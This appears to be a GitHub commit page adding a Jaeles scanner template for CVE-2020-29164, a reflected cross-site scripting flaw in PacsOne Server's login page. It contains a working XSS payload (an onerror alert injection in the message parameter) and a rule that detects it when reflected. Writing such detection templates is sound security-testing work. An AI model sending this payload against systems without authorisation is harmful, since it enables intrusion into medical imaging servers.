Merge pull request #24 from ghsec/patch-13

Create PacsOne-Server-xss-cve-2020-29164.yaml
jaeles-project · Feb 15, 2021 · 8848d24 · 8848d24
2 parents 1038186 + 6ec7a9d
commit 8848d24
Showing 1 changed file with 21 additions and 0 deletions.
diff --git a/cves/PacsOne-Server-xss-cve-2020-29164.yaml b/cves/PacsOne-Server-xss-cve-2020-29164.yaml
@@ -0,0 +1,21 @@
+id: PacsOne-Server-xss-cve-2020-29164
+info:
+  name: PacsOne Server reflect xss - CVE-2020-29164
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+     {{.root}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
+    detections:
+      - >-
+        StringSearch("resBody", '<img src="" onerror="alert(1);">1</img>') && StatusCode() != 301 && StatusCode() != 302
+
+references:
+  - link: https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d